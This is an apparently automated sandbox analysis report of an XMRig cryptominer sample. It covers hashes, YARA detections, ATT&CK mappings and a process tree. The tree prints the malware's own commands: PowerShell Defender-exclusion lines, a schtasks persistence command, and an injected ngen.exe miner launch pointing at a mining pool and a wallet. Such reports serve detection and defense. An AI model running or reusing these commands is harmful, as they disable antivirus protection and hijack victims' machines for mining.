xmrig | 89d97e29a3a8e5b5f1eae6e94ad6f24c03db2cdeac0c08233dd05193ec6c8699

Analysis

max time kernel
45s
max time network
65s
platform
windows7_x64
resource
win7-20230621-en
resource tags

arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system
submitted
01/07/2023, 08:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.3MB
MD5

07176d129de6501a6c733701ce76fd4e
SHA1

20837ae94fffc7cc9df911f7d0ed23cc9c877007
SHA256

89d97e29a3a8e5b5f1eae6e94ad6f24c03db2cdeac0c08233dd05193ec6c8699
SHA512

8f6325a244181b04f29d301249aa7184d582546ecf35bf00a3fd3c34219464e9bc91be42e9a87177eea9c541df494b1ad77f2f0294b741a8f5c92a570a765465
SSDEEP

12288:pG1mg2jJvz/oxbDXR4Nd9YWYaV+lmI0GNHXzvxkMHafenJ34mUw5G3riXcYwbY2p:pqmLFoP4Nr2H10m0GxKLjSKio

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 17 IoCs

miner

resource	yara_rule
behavioral1/memory/1912-116-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-117-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-118-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-119-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-120-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-121-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-122-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-123-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-125-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-127-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-129-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-130-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-131-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-132-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-133-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-134-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1912-135-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

.NET Reactor proctector 5 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/108-54-0x0000000000EA0000-0x0000000000FF2000-memory.dmp	net_reactor
behavioral1/files/0x000a000000013990-86.dat	net_reactor
behavioral1/files/0x000a000000013990-84.dat	net_reactor
behavioral1/files/0x000a000000013990-87.dat	net_reactor
behavioral1/memory/1572-88-0x0000000001060000-0x00000000011B2000-memory.dmp	net_reactor

Executes dropped EXE 1 IoCs

pid	Process
1572	RKGME.exe

Loads dropped DLL 1 IoCs

pid	Process
1060	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1664	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1108	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1652	powershell.exe
2044	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	108	file.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	1572	RKGME.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 108 wrote to memory of 2044	108	file.exe	27
PID 108 wrote to memory of 2044	108	file.exe	27
PID 108 wrote to memory of 2044	108	file.exe	27
PID 108 wrote to memory of 1652	108	file.exe	28
PID 108 wrote to memory of 1652	108	file.exe	28
PID 108 wrote to memory of 1652	108	file.exe	28
PID 108 wrote to memory of 1060	108	file.exe	31
PID 108 wrote to memory of 1060	108	file.exe	31
PID 108 wrote to memory of 1060	108	file.exe	31
PID 1060 wrote to memory of 1108	1060	cmd.exe	33
PID 1060 wrote to memory of 1108	1060	cmd.exe	33
PID 1060 wrote to memory of 1108	1060	cmd.exe	33
PID 1060 wrote to memory of 1572	1060	cmd.exe	34
PID 1060 wrote to memory of 1572	1060	cmd.exe	34
PID 1060 wrote to memory of 1572	1060	cmd.exe	34
PID 1572 wrote to memory of 1988	1572	RKGME.exe	37
PID 1572 wrote to memory of 1988	1572	RKGME.exe	37
PID 1572 wrote to memory of 1988	1572	RKGME.exe	37
PID 1572 wrote to memory of 1976	1572	RKGME.exe	35
PID 1572 wrote to memory of 1976	1572	RKGME.exe	35
PID 1572 wrote to memory of 1976	1572	RKGME.exe	35
PID 1572 wrote to memory of 1308	1572	RKGME.exe	39
PID 1572 wrote to memory of 1308	1572	RKGME.exe	39
PID 1572 wrote to memory of 1308	1572	RKGME.exe	39

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1652
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB53C.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1060
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1108
- - C:\ProgramData\BackUp\RKGME.exe
    "C:\ProgramData\BackUp\RKGME.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      PID:1976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      PID:1988
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "RKGME" /tr "C:\ProgramData\BackUp\RKGME.exe"
      4⤵
      PID:1308
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "RKGME" /tr "C:\ProgramData\BackUp\RKGME.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:1664
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      PID:1912

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\BackUp\RKGME.exe

Filesize
432.5MB

MD5
77839c91c5bef0e6296f0b66ef6350ad

SHA1
037587eef6dc77795b10842773802d9666eace66

SHA256
a9918373731f61cde261ae630d7310455d8e6cbf38e797a8cef34b6cf5258639

SHA512
d462df835dafb599b9adb75f6270957478aa885f4ae46526bc114f5ad447fb0ec6c4ee9c3c6f90f0804c65a18658256e0c7ffcbea0baf70a95ad95bea61d1392

Download Submit
C:\ProgramData\BackUp\RKGME.exe

Filesize
427.4MB

MD5
6e7471b0b6deb155a3540dc9be5977d9

SHA1
807fe8a37187f45e1c806a11a740b33407f585f4

SHA256
3a1b9e4e8cd0cb8ec6050af6bc1aa57dd93c588915c4ad1b592314aa3bb6a5f8

SHA512
3b6ad2812fe7d4d8920b5c7c1190298c289c03a059703939ca4c9d7a440d8a289d6f5a8632ec13a0217cd88df8bd1aeea429b27bc652b367567006416b9558fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB53C.tmp.bat

Filesize
140B

MD5
c4cb413c353fa1793c5c1f9144ab0f7f

SHA1
69248f592e3ef3262205ffbb6d8e0198d26c479f

SHA256
8b2cf0023c5ca5793e372c4d21a11de084de43623b5f497ede154bc5479e114c

SHA512
b247ba263637e1d45922ec09872d4a2a1ff31826e8566e481f1d276b39b07ac63ddbb7e8eb398dfc050e56ca26f0c0e7bba82a5e3619e5d0f950fa161b7e57a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB53C.tmp.bat

Filesize
140B

MD5
c4cb413c353fa1793c5c1f9144ab0f7f

SHA1
69248f592e3ef3262205ffbb6d8e0198d26c479f

SHA256
8b2cf0023c5ca5793e372c4d21a11de084de43623b5f497ede154bc5479e114c

SHA512
b247ba263637e1d45922ec09872d4a2a1ff31826e8566e481f1d276b39b07ac63ddbb7e8eb398dfc050e56ca26f0c0e7bba82a5e3619e5d0f950fa161b7e57a8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ec25ca6282ba8f105a77737c9f351b28

SHA1
44e4f79d7563b804793140948253e8295425bf01

SHA256
b44df187b4189a4ffa58e9ba13ed7ff7dbbdc2b2d504fee2a7e5e9d9fc7e2467

SHA512
0e948e3a23e1a65ea30a0c91753ef291574b4e34a74c544b9f6dd5dcd85af3e584280e3cba8c4ff09737c4ef31f5e0d1f8e0243b6eecdc516cc818f9a5a4f5e8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ec25ca6282ba8f105a77737c9f351b28

SHA1
44e4f79d7563b804793140948253e8295425bf01

SHA256
b44df187b4189a4ffa58e9ba13ed7ff7dbbdc2b2d504fee2a7e5e9d9fc7e2467

SHA512
0e948e3a23e1a65ea30a0c91753ef291574b4e34a74c544b9f6dd5dcd85af3e584280e3cba8c4ff09737c4ef31f5e0d1f8e0243b6eecdc516cc818f9a5a4f5e8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ec25ca6282ba8f105a77737c9f351b28

SHA1
44e4f79d7563b804793140948253e8295425bf01

SHA256
b44df187b4189a4ffa58e9ba13ed7ff7dbbdc2b2d504fee2a7e5e9d9fc7e2467

SHA512
0e948e3a23e1a65ea30a0c91753ef291574b4e34a74c544b9f6dd5dcd85af3e584280e3cba8c4ff09737c4ef31f5e0d1f8e0243b6eecdc516cc818f9a5a4f5e8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L4VD4DDXAZ20NOB15NZB.temp

Filesize
7KB

MD5
ec25ca6282ba8f105a77737c9f351b28

SHA1
44e4f79d7563b804793140948253e8295425bf01

SHA256
b44df187b4189a4ffa58e9ba13ed7ff7dbbdc2b2d504fee2a7e5e9d9fc7e2467

SHA512
0e948e3a23e1a65ea30a0c91753ef291574b4e34a74c544b9f6dd5dcd85af3e584280e3cba8c4ff09737c4ef31f5e0d1f8e0243b6eecdc516cc818f9a5a4f5e8

Download Submit
\ProgramData\BackUp\RKGME.exe

Filesize
437.5MB

MD5
c2bccb7acc73526283ade381f71fefdf

SHA1
7bfcdbeaf88441fff89fda53b182780f9cea8200

SHA256
0ccb09b8f89dab3cd63630f6c9a29a9278952dab9a9378b9751bb2261a1c255b

SHA512
450c854d6774a76717d4ef06010d56bf1bf3758f6ff1db3368f499e2f93071cbd2c12877aa8c3e7ab3f2ee28ac88c29456b66b3d129189d045c9aa391f7315f3

Download Submit
memory/108-73-0x000000001C0F0000-0x000000001C170000-memory.dmp

Filesize
512KB

Download
memory/108-54-0x0000000000EA0000-0x0000000000FF2000-memory.dmp

Filesize
1.3MB

Download
memory/108-56-0x0000000000850000-0x0000000000851000-memory.dmp

Filesize
4KB

Download
memory/108-55-0x000000001C0F0000-0x000000001C170000-memory.dmp

Filesize
512KB

Download
memory/1572-90-0x00000000005D0000-0x00000000005D1000-memory.dmp

Filesize
4KB

Download
memory/1572-88-0x0000000001060000-0x00000000011B2000-memory.dmp

Filesize
1.3MB

Download
memory/1572-89-0x000000001BF10000-0x000000001BF90000-memory.dmp

Filesize
512KB

Download
memory/1652-72-0x000000000283B000-0x0000000002872000-memory.dmp

Filesize
220KB

Download
memory/1652-71-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download
memory/1912-120-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-125-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-135-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-134-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-133-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-132-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-131-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-130-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-129-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-128-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/1912-113-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-114-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-115-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-116-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-117-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-118-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-119-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-127-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-121-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-122-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-123-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1912-124-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1976-107-0x000000000289B000-0x00000000028D2000-memory.dmp

Filesize
220KB

Download
memory/1976-106-0x0000000002894000-0x0000000002897000-memory.dmp

Filesize
12KB

Download
memory/1988-109-0x0000000002A5B000-0x0000000002A92000-memory.dmp

Filesize
220KB

Download
memory/1988-108-0x0000000002A54000-0x0000000002A57000-memory.dmp

Filesize
12KB

Download
memory/1988-103-0x0000000002370000-0x0000000002378000-memory.dmp

Filesize
32KB

Download
memory/1988-98-0x000000001B3B0000-0x000000001B692000-memory.dmp

Filesize
2.9MB

Download
memory/2044-69-0x0000000002294000-0x0000000002297000-memory.dmp

Filesize
12KB

Download
memory/2044-67-0x000000001B0C0000-0x000000001B3A2000-memory.dmp

Filesize
2.9MB

Download
memory/2044-68-0x0000000002470000-0x0000000002478000-memory.dmp

Filesize
32KB

Download
memory/2044-70-0x000000000229B000-0x00000000022D2000-memory.dmp

Filesize
220KB

Download